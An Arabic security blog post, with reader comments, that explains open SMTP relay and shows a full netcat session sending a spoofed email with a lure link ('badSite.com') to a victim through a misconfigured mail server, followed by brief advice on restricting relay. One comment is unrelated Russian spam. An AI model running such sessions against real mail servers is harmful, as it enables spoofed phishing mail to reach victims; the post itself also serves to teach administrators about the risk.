فحص خادم الـSMTP و خطورة فتح الـ Relay

الكاتب: | يوم: 25 مارس, 2012 | التعليقات: 8 | القراءات: - عدد المشاهدات 26٬166

نعلم جميعا أنه من أهم مراحل الاختراق و من أكثرها فائدة هي مرحلة الـ Service Enumeration  و التي قد تصل بنا من مرحلة جمع معلومات إلى مرحلة اختراق أسهل و أكثر فعالية. في هذا الموضوع سأعطي مثال بسيط عن خادم بريد(Mail Server) يسمح لخاصية الـ Relay و التي -باختصار- تسمح لأجهزة أخرى أن تتصل بخادم البريد على المنفذ 25 لإرسال بريد عن طريقه. هذه المشكلة لا تعتبر ثغرة نظام أو تطبيق , بل عيب في إعداد الـ Mail Server  من قبل مدير النظام.

كل ما علينا هو الاتصال بالمنفذ 25/tcp و من ثم تنفيذ الأوامر الأساسية التي يستخدمها بروتوكول الـSMTP  في إرسال بريد.

 

[[email protected] ~]$ nc -nv Mail-ServerIP 25

Connection to Mail-ServerIP 25 port [tcp/*] succeeded!
220 mail1.domain.com ESMTP Sendmail X.xx.y/X.xx.y; Sun, 25 Mar 2012 11:03:27 +0300

EHLO google.com

250-mail1.domain.com Hello Hacker-PubIP.rev.home.ne.jp [Hacker-PubIP], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH DIGEST-MD5 CRAM-MD5
250-DELIVERBY
250 HELP

MAIL FROM: [email protected]

250 2.1.0 [email protected]… Sender ok

RCPT TO: [email protected]

250 2.1.5 [email protected]… Recipient ok

DATA

354 Enter mail, end with “.” on a line by itself


Hi please  ,,
please find my Pic on
http://badSite.com/profile.html

Thanks
.

250 2.0.0 q2P83R4D009362 Message accepted for delivery

QUIT

221 2.0.0 mail1.domain.com closing connection

نفذنا أوامر بسيطة جدا لكن هناك الكثير لتفعله(اترك الباقي لكم), لتتعرف على المزيد من أوامر البروتوكول SMTP

و الرسالة ستصل إلى  بريد الضحية..

للحماية من هذا النوع من الهجمات , يجب أت تقفل أو تحدد الـ Relay في خادم البريد و من الجدار الناري.

نبذة عن الكاتب

المهندس صبري صالح. مهندس حماية شبكات و أنظمة و فحصها معالجة و تحليل الأحداث الأمنية و المسؤول عن تطبيق معايير الـ ISO 27001 , يعمل في بيئات متعددة المنصات. حاصل على عدة شهادات تقنية.

التعليقات:

اترك تعليقاً | عدد التعليقات: (8)

  1. يقول حسام:
    أبريل 4, 2012 الساعة 6:43 ص

    شكرا للمعلومات الهامة الواضحة اعلاه ، ولكن ارجو التوضيح كيف اقوم او ما هى الخطوات التى تقوم بحماية خدمة البريد من الدخلاء باستخدام اداة التلنت

    رد
  2. يقول صبري صالح:
    أبريل 5, 2012 الساعة 2:52 ص

    @حسام

    – إغلاق خيار الـ Relay أو تحديده بخوادم معينه:
    يفضل طبعا أن تكون الخوادم في شبكة داخلية و ليست خوادم خارجية, حيث هي الأخرى معرضة للاختراق بنسبة أكبر من خوادم في شبكة داخلية.

    – استخدام الـ Authentication مع الخوادم المسموح لها بالـ Relay.

    رد
  3. يقول حسان:
    أبريل 5, 2012 الساعة 6:02 ص

    شكرا لك مهندس صبري… ممكن تعطينا فكره عن عمل ال relay و شو وظيفته؟؟
    شكرا لك

    رد
  4. يقول حسام:
    أبريل 11, 2012 الساعة 6:35 ص

    شكرا المهندس صبري

    ممكن شرح اوفر عن كيفية عمل (- استخدام الـ Authentication مع الخوادم المسموح لها بالـ Relay) و هل هذا سوف يؤدى الى منع استلام اى بريد الكترونى من الخارج اذا كان المرسل ما زال يستخدم اصدرات قديمة من exchange
    .

    رد
  5. يقول abdou:
    يوليو 23, 2012 الساعة 2:12 م

    mafhmt walo ma3a l3ilm anani dayr réseau informatique

    رد
  6. يقول monnsef:
    نوفمبر 3, 2015 الساعة 3:13 م

    لدي مشكلة مع telnet======> telnet google.com 25
    telnet unable to connect to remote host <========resultat

    رد
  7. يقول Hecnum:
    مارس 22, 2017 الساعة 8:25 ص

    смотреть как заработать деньги в интернете реальная работа и заработок в интернете 7 способов заработка в интернете

    رد

أكتب تعليق